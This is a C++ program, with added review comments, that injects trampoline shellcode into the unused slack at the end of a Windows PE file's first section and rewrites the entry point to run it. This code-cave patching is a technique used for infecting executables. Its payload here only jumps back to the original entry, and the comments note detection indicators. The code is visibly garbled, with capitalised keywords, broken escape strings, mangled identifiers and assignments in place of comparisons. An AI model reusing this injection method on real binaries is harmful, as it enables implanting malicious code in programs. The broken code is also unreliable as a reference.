Insert shellcode into the unused slack space at the end of a PE section
[Cpp]
// InsertShellCodeToPE.cpp: Defines the entry point for the console application.
//
# Include "stdafx. h"
# Include <Windows. h>
# Define FILENAME "hello.exe"
// Trampoline shellcode. The escape sequences below are garbled with spaces in this
// transcription; read as \x90 \x90 \x90 \x90 \xb8 ?? ?? ?? ?? \xff \xe0 \x00 they decode to:
//   [0..3]  90 90 90 90   nop x4
//   [4]     b8            mov eax, imm32
//   [5..8]  90 90 90 90   placeholder imm32, overwritten in main() with the original entry address
//   [9..10] ff e0         jmp eax
//   [11]    00            explicit terminator, so strlen(shellcode) == 11 while sizeof(shellcode) == 13
// The payload does nothing except jump back to the original entry point; what the
// program demonstrates is the code-cave patching itself, not a malicious payload.
Char shellcode [] = "\ x90 \ x90 \ x90 \ x90 \ xb8 \ x90 \ x90 \ x90 \ x90 \ xff \ xe0 \ x00 ";
/*************************************************************************/
/* DWORD FindSpace(LPVOID lpBase, PIMAGE_NT_HEADERS pNTHeader)           */
/* Purpose:   Locate a run of unused (all-zero) bytes at the tail of the */
/*            FIRST section's raw data, large enough to hold shellcode.  */
/* Parameter: lpBase    - base address of the mapped PE file             */
/*            pNTHeader - pointer to the file's IMAGE_NT_HEADERS         */
/* Return:    absolute address (inside the mapping) of the free run,     */
/*            or 0 if none was found.                                    */
/* Review notes:                                                         */
/*  - Only the first section header is examined; later sections are     */
/*    never considered.                                                  */
/*  - The candidate run starts at the last sizeof(shellcode) bytes of    */
/*    the section's raw data and moves one byte lower per failed probe.  */
/*  - The loop bound compares an absolute pointer (dwAddr) against       */
/*    Misc.VirtualSize, a size relative to the section start. This looks */
/*    like a units mismatch: it does not stop the scan at the section's  */
/*    used data, so a probe can walk down into live code or headers.     */
/*    Presumably lpBase + PointerToRawData + VirtualSize was intended -  */
/*    confirm.                                                           */
/*  - The section is never checked for IMAGE_SCN_MEM_EXECUTE; the code   */
/*    assumes the first section is executable.                           */
/*  - Pointers are truncated to DWORD: valid for a 32-bit build only.    */
/*  - sizeof(shellcode) (13) and strlen(shellcode) (11) are both used    */
/*    as the required size; the larger one governs the start position,   */
/*    the smaller one the zero check.                                    */
/*************************************************************************/
DWORD FindSpace (LPVOID lpBase, PIMAGE_NT_HEADERS pNTHeader)
{
PIMAGE_SECTION_HEADER ction;                       // first section header
// The section table immediately follows the optional header (same as IMAGE_FIRST_SECTION).
Ction = (PIMAGE_SECTION_HEADER) (BYTE *) & pNTHeader-> OptionalHeader + pNTHeader-> FileHeader. SizeOfOptionalHeader );
DWORD dwAddr;
// Highest file offset at which sizeof(shellcode) bytes still fit inside the section's raw data.
DwAddr = direction ction-> PointerToRawData + direction ction-> SizeOfRawData-sizeof (shellcode );
// File offset -> address inside the mapping (pointer truncated to DWORD; 32-bit only).
DwAddr = (DWORD) (BYTE *) lpBase + dwAddr );
// NOTE(review): absolute address compared with a section size - see header note; this
// bound is effectively always true and does not confine the scan to the section's tail.
While (dwAddr> callback ction-> Misc. VirtualSize)
{
DWORD I = 0;
// Probe strlen(shellcode) bytes (11 for the literal above, it stops at the explicit \x00).
For (I = 0; I <strlen (shellcode); I ++)
{
// Any non-zero byte means this slot is in use; give up on it and try one byte lower.
If (* (BYTE *) dwAddr + I )! = 0)
{
Break;
}
}
// Every probed byte was zero: this is the cave. (Single '=' here is presumably a
// transcription of '==', as in the other comparisons in this file.)
If (I = strlen (shellcode ))
{
Return dwAddr;
}
DwAddr --;                                          // slide the window down one byte
}
Return 0;                                           // no zero-filled run found
}
/*************************************************************************/
/* int main(int argc, char *argv[])                                      */
/* Opens FILENAME ("hello.exe") read/write, maps the whole file, finds a */
/* zero-filled run at the tail of the first section with FindSpace,      */
/* copies the trampoline shellcode there with the original entry address */
/* patched into it, and points AddressOfEntryPoint at the copy.          */
/* Return: 0 on success, -1 on any failure (a message is printed).       */
/* Review notes:                                                         */
/*  - e_lfanew is used to locate the NT headers before any range check;  */
/*    an out-of-range value reads outside the mapping, and the two       */
/*    signature tests are joined with '|' (bitwise), so both are always  */
/*    evaluated. The result is the same as '||' because '!=' binds       */
/*    tighter, but the read happens before the DOS signature is trusted. */
/*  - The new entry point is stored as a FILE OFFSET, but the field      */
/*    holds an RVA; the two coincide only when the first section's       */
/*    VirtualAddress equals its PointerToRawData.                        */
/*  - The trampoline's target is the absolute ImageBase + OEP; it is     */
/*    stale if the loader relocates the image (ASLR).                    */
/*  - OptionalHeader.CheckSum is not recalculated and any Authenticode   */
/*    signature on the file is invalidated; both are simple integrity    */
/*    checks that expose a patched binary. An entry point that lands in  */
/*    a section's zero-padding tail and immediately jumps back to the    */
/*    original entry is likewise a classic code-cave indicator.          */
/*  - Pointers are truncated to DWORD throughout: 32-bit build only.     */
/*  - 'n', 'direction ction' and 'secToAdd' are declared but never used. */
/*************************************************************************/
Int main (int argc, char * argv [])
{
// Open the target with read, write AND execute generic rights; only read is shared.
HANDLE hFile =: CreateFile (FILENAME, FILE_GENERIC_READ | FILE_GENERIC_WRITE | FILE_GENERIC_EXECUTE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
If (INVALID_HANDLE_VALUE = hFile)
{
Printf ("createfile error ");
Return-1;
}
// Size 0/0 maps the whole file; PAGE_READWRITE so edits go straight to the file image.
HANDLE hFileMap =: CreateFileMapping (hFile, NULL, PAGE_READWRITE, 0, 0, NULL );
Int n = GetLastError ();                            // unused
If (NULL = hFileMap)
{
Printf ("CreateFileMapping error ");
CloseHandle (hFile );
Return-1;
}
LPVOID lpMemory =: MapViewOfFile (hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
If (NULL = lpMemory)
{
Printf ("MapViewOfFile error ");
CloseHandle (hFileMap );
CloseHandle (hFile );
Return-1;
}
// Walk the headers directly in the mapped view.
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER) lpMemory;
// NOTE(review): e_lfanew is unvalidated here; pointer is also truncated to DWORD.
PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS) (DWORD) lpMemory + pDosHeader-> e_lfanew );
PIMAGE_FILE_HEADER pFileHeader = (PIMAGE_FILE_HEADER) & (pNTHeader-> FileHeader );
PIMAGE_OPTIONAL_HEADER pOptionalHeader = (PIMAGE_OPTIONAL_HEADER) & pNTHeader-> OptionalHeader;
PIMAGE_SECTION_HEADER direction ction = NULL;      // unused
IMAGE_SECTION_HEADER secToAdd = {0 };               // unused
// Sanity check: "MZ" and "PE\0\0". Bitwise '|' evaluates both sides (see header note).
If (pDosHeader-> e_magic! = IMAGE_DOS_SIGNATURE | pNTHeader-> Signature! = IMAGE_NT_SIGNATURE)
{
Printf ("Not valid PE file ...");
UnmapViewOfFile (lpMemory );
CloseHandle (hFileMap );
CloseHandle (hFile );
Return-1;
}
// Absolute address (inside the mapping) of a zero-filled run in the first section, or 0.
DWORD dwAddr = FindSpace (lpMemory, pNTHeader );
If (dwAddr = 0)
{
Printf ("the first section do not has enough space ");
UnmapViewOfFile (lpMemory );
CloseHandle (hFileMap );
CloseHandle (hFile );
Return-1;
} Www.2cto.com
// Original entry point as an absolute virtual address: ImageBase + RVA.
// NOTE(review): hard-coded into the trampoline, so wrong if the image is relocated.
DWORD dwOEP = pOptionalHeader-> AddressOfEntryPoint;
DwOEP = (DWORD) (pOptionalHeader-> ImageBase + dwOEP );
// Take the length BEFORE patching: the address written below may contain 0x00 bytes,
// which would make a later strlen() stop early.
DWORD dwShellcodeLen = strlen (shellcode );
// Patch the imm32 of the 'mov eax, imm32' (opcode b8 at index 4) with the OEP.
* (DWORD *) & shellcode [5] = dwOEP;
// Copy the 11 trampoline bytes into the cave (its bytes were verified to be zero already).
Memcpy (char *) dwAddr, shellcode, dwShellcodeLen );
// Back from mapping address to file offset ...
DwAddr = dwAddr-(DWORD) (BYTE *) lpMemory;
// ... and stored as the new entry point. NOTE(review): AddressOfEntryPoint is an RVA,
// not a file offset - correct only if the section's VirtualAddress == PointerToRawData.
PNTHeader-> OptionalHeader. AddressOfEntryPoint = dwAddr;
// Unmapping writes the modified pages back to the file; the checksum is left stale.
: UnmapViewOfFile (lpMemory );
: CloseHandle (hFileMap );
: CloseHandle (hFile );
Return 0;
}